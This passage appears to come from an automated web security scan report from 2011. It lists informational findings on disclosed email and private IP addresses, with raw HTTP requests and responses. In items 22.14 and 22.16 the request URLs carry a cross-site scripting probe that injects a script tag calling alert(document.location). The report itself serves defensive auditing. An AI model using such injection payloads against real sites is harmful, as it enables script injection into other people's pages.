Host: www.thedailygreen.com
Proxy-Connection: keep-alive
Referer: http://www.thedailygreen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: original_referrer=http://hearst.com/newspapers/metrix4media.php

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/x-javascript
ETag: "1bb006-48db-48561512bfef7"
Vary: Accept-Encoding
X-Pad: avoid browser bug
Cache-Control: max-age=2132970
Date: Sat, 17 Sep 2011 16:24:25 GMT
Content-Length: 18651
Connection: close

/*
based on
http://www.JSON.org/json2.js
2008-11-19

jQuery plugin info:
@author Jim Dalton (jim.dalton@furrybrains.com)
@date 1/15/2009
@version 1.0

Comments below were modified to reflect usage in the context of jQuery. Otherwise
these comments are identical to the source library.

Public
...[SNIP]...
21.47. http://www.zvents.com/misc/widgets/20645.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zvents.com
Path:   /misc/widgets/20645.js

Issue detail

The following email address was disclosed in the response:

Request

GET /misc/widgets/20645.js?65617 HTTP/1.1
Host: www.zvents.com
Proxy-Connection: keep-alive
Referer: http://www.timesunion.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 56852
Date: Sat, 17 Sep 2011 00:35:45 GMT
Expires: Sat, 17 Sep 2011 04:35:45 GMT
Cache-Control: max-age=14400
Content-Length: 226756
Connection: Keep-Alive
Via: NS-CACHE-8.0: 1
Server: nginx/0.6.39
Content-Type: application/x-javascript
Last-Modified: Fri, 19 Aug 2011 01:09:25 GMT


zvents_save_jquery = {};

if (typeof jQuery != 'undefined') zvents_save_jquery.jQuery = jQuery;
if (typeof $ != 'undefined') zvents_save_jquery.$ = $;
/*!
* jQuery JavaScript Library v1.4.2
* http:
...[SNIP]...
port for radix argument. Use module pattern for better encapsulation.

Latest version: http://www.broofa.com/Tools/Math.uuid.js
Information: http://www.broofa.com/blog/?p=151
Contact: robert@broofa.com
----
Copyright (c) 2008, Robert Kieffer
All rights reserved.

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are
...[SNIP]...
22. Private IP addresses disclosed  previous  next
There are 129 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

22.1. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQCXDw9kolADUScW&url=http%3A%2F%2Fmimg.ugo.com%2F201108%2F8%2F2%2F0%2F207028%2Fcuts%2Ftitle_72x72.png HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
X-FB-Server: 10.62.177.47
X-Cnection: close
Content-Length: 12104
Cache-Control: public, max-age=7508
Expires: Sat, 17 Sep 2011 18:29:56 GMT
Date: Sat, 17 Sep 2011 16:24:48 GMT
Connection: close

.PNG
.
...IHDR...H...H.....U..G.. .IDATx.d...eYv....Lw....SU.5t.=...A M...[..,?..............o._`..6......aP.E.CS..f....]SVfVf.|.3....f..o ..@Lg...^..........i4..<....>d.\S.rf...d...w..0L&#F..Y..E.
...[SNIP]...
22.2. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQDOjpA2tDe0b8Ja&w=180&h=540&url=http%3A%2F%2Fupload.wikimedia.org%2Fwikipedia%2Fcommons%2Fthumb%2F9%2F9f%2FDavid_Weprin.jpg%2F720px-David_Weprin.jpg&fallback=hub_person HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.gather.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.62.47.34
X-Cnection: close
Content-Length: 10414
Vary: Accept-Encoding
Cache-Control: public, max-age=1209600
Expires: Sat, 01 Oct 2011 16:29:49 GMT
Date: Sat, 17 Sep 2011 16:29:49 GMT
Connection: close

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...
22.3. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQCsEyiAVgOHOrhT&url=http%3A%2F%2Fmimg.ugo.com%2F201109%2F6%2F8%2F1%2F208186%2Fcuts%2Fkane_72x72.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.33.31.102
X-Cnection: close
Content-Length: 2446
Vary: Accept-Encoding
Cache-Control: public, max-age=644
Expires: Sat, 17 Sep 2011 16:55:23 GMT
Date: Sat, 17 Sep 2011 16:44:39 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...
22.4. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQC5EHmsXLbzRvBs&url=http%3A%2F%2Fcdn.uproxx.com%2Fwp-content%2Fuploads%2F2011%2F09%2FPicture-29-150x150.png HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=www.uproxx.com&width=275&height=260&header=false&colorscheme=light&recommendations=true&border_color=%23ffffff
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
X-FB-Server: 10.62.138.48
X-Cnection: close
Content-Length: 48898
Cache-Control: public, max-age=86400
Expires: Sun, 18 Sep 2011 17:36:17 GMT
Date: Sat, 17 Sep 2011 17:36:17 GMT
Connection: close

.PNG
.
...IHDR.............<.q... .IDATx.l.y.e.U.....;.!.)...L...TR..$$$.T.I,!.n.......6t..j.m..........,l.F d$..H.4Q.R...Ref..s..7....../2
xk.................O.X.P".[ .^.g...V.C....1..s.|..|....K

...[SNIP]...
22.5. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQAuBUAq_2vsecxZ&url=http%3A%2F%2Fcdn.uproxx.com%2Fwp-content%2Fuploads%2F2011%2F09%2Falwaysunny-pong-150x150.gif HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=www.uproxx.com&width=275&height=260&header=false&colorscheme=light&recommendations=true&border_color=%23ffffff
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/gif
X-FB-Server: 10.54.234.64
X-Cnection: close
Content-Length: 15020
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Sun, 18 Sep 2011 17:36:17 GMT
Date: Sat, 17 Sep 2011 17:36:17 GMT
Connection: close

GIF87a..........-b#i
.$:..b<J8#@..8.$IK/e5.``0...iK+#".bt4......FNLz`4.......N457$HW(lRL.v@,(>hW....D)?..._j,.......1.XK1.4<......B/.eA$?..b`Q.....................8C,...\.,.rl.......|l@.",Y!....^\L'..
...[SNIP]...
22.6. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQBbYXAnPNJ3E-jn&url=http%3A%2F%2Fcdn.uproxx.com%2Fwp-content%2Fuploads%2F2011%2F09%2Fbaby-godfather-03-150x150.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=www.uproxx.com&width=275&height=260&header=false&colorscheme=light&recommendations=true&border_color=%23ffffff
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.32.161.123
Content-Length: 5982
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Sun, 18 Sep 2011 17:36:18 GMT
Date: Sat, 17 Sep 2011 17:36:18 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...
22.7. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQCjT5YgPgTU-7gD&url=http%3A%2F%2Fmimg.ugo.com%2F201109%2F7%2F8%2F5%2F208587%2Fcuts%2Fbreaking-dawn_72x72.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.55.1.59
X-Cnection: close
Content-Length: 2150
Vary: Accept-Encoding
Cache-Control: public, max-age=5906
Expires: Sat, 17 Sep 2011 18:03:14 GMT
Date: Sat, 17 Sep 2011 16:24:48 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...
22.8. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQAwPWF7uXZwA93Z&url=http%3A%2F%2Fmimg.ugo.com%2F201109%2F5%2F1%2F0%2F208015%2Fcuts%2Fkiller-elite-movie-poster_72x72.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.54.198.57
X-Cnection: close
Content-Length: 2221
Vary: Accept-Encoding
Cache-Control: public, max-age=9401
Expires: Sat, 17 Sep 2011 19:01:29 GMT
Date: Sat, 17 Sep 2011 16:24:48 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...
22.9. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQBz6JHU51GTtzlJ&url=http%3A%2F%2Fcdn.uproxx.com%2Fwp-content%2Fuploads%2F2011%2F09%2Fcharlie-day-interview-150x150.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=www.uproxx.com&width=275&height=260&header=false&colorscheme=light&recommendations=true&border_color=%23ffffff
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.64.138.64
X-Cnection: close
Content-Length: 6281
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Sun, 18 Sep 2011 17:36:18 GMT
Date: Sat, 17 Sep 2011 17:36:18 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...
22.10. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQCZOUqLxVS9KxbC&url=http%3A%2F%2Fmimg.ugo.com%2F201102%2F7%2F2%2F2%2F175227%2Fcuts%2Fthe-incredible-hulk_72x72.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.42.118.41
X-Cnection: close
Content-Length: 1608
Vary: Accept-Encoding
Cache-Control: public, max-age=10733
Expires: Sat, 17 Sep 2011 19:23:41 GMT
Date: Sat, 17 Sep 2011 16:24:48 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...
22.11. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQBG8W0aggDi2ss8&url=http%3A%2F%2Fcdn.uproxx.com%2Fwp-content%2Fuploads%2F2011%2F09%2FLebowski-Cycle-Joe-Forkan-The-Death-of-Marat-1-150x150.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=www.uproxx.com&width=275&height=260&header=false&colorscheme=light&recommendations=true&border_color=%23ffffff
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.62.184.37
X-Cnection: close
Content-Length: 5193
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Sun, 18 Sep 2011 17:36:17 GMT
Date: Sat, 17 Sep 2011 17:36:17 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...
22.12. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQA0Joq77Rj0_j1h&url=http%3A%2F%2Fmimg.ugo.com%2F201109%2F6%2F7%2F4%2F208476%2Fcuts%2Fugo-sunny_72x72.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.27.162.132
X-Cnection: close
Content-Length: 2083
Vary: Accept-Encoding
Cache-Control: public, max-age=9361
Expires: Sat, 17 Sep 2011 19:00:49 GMT
Date: Sat, 17 Sep 2011 16:24:48 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...
22.13. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQC2BCmxSJAyXo8Z&url=http%3A%2F%2Fmimg.ugo.com%2F201109%2F2%2F3%2F1%2F208132%2Fcuts%2Fmain_72x72.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.54.41.39
X-Cnection: close
Content-Length: 2006
Vary: Accept-Encoding
Cache-Control: public, max-age=10738
Expires: Sat, 17 Sep 2011 19:29:16 GMT
Date: Sat, 17 Sep 2011 16:30:18 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...
22.14. http://hfm.checkm8.com/adam/cm8adam_1_call.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hfm.checkm8.com
Path:   /adam/cm8adam_1_call.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /adam/cm8adam_1_call.js HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:34:46 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Age: 0
Cache-Control: max-age=3600
Vary: Accept-Encoding
Content-Length: 18952
Connection: close
Content-Type: application/javascript

// All rights reserved CheckM8 Inc. (c) 2009


if (typeof(window.CM8Page) == "undefined") {
   if (document.location && (document.location.search.indexOf('CM8Page=') != -1))
       window.CM8Page=document
...[SNIP]...
22.15. http://hfm.checkm8.com/adam/cm8adam_1_call.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hfm.checkm8.com
Path:   /adam/cm8adam_1_call.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /adam/cm8adam_1_call.js HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:24:53 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Age: 0
Cache-Control: max-age=3600
Vary: Accept-Encoding
Content-Length: 18952
Connection: close
Content-Type: application/javascript

// All rights reserved CheckM8 Inc. (c) 2009


if (typeof(window.CM8Page) == "undefined") {
   if (document.location && (document.location.search.indexOf('CM8Page=') != -1))
       window.CM8Page=document
...[SNIP]...
22.16. http://hfm.checkm8.com/adam/detect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hfm.checkm8.com
Path:   /adam/detect

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1106&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=7748968311440455&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:34:52 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.11 NY-AD1
Set-cookie: cm8dccp=1316277291;Path=/;Expires=Sun, 18-Sep-2011 16:34:51 GMT;
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 574
Connection: close
Content-Type: text/html

window.CM8DispatcherApps=window.CM8DispatcherApps||[];
window.CM8DispatcherApps.push('http://hfm.checkm8.com/adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http
...[SNIP]...
22.17. http://hfm.checkm8.com/adam/detect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hfm.checkm8.com
Path:   /adam/detect

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:31:41 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: A=dqR5Y9wlLIIUv9UJ7MTba;Path=/;
Set-cookie: C=oYX5Y9we4KW1caacaSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:05:00 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 156175586/1230314867/2850622218/2591229859
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...
22.18. http://hfm.checkm8.com/adam/detected  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hfm.checkm8.com
Path:   /adam/detected

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

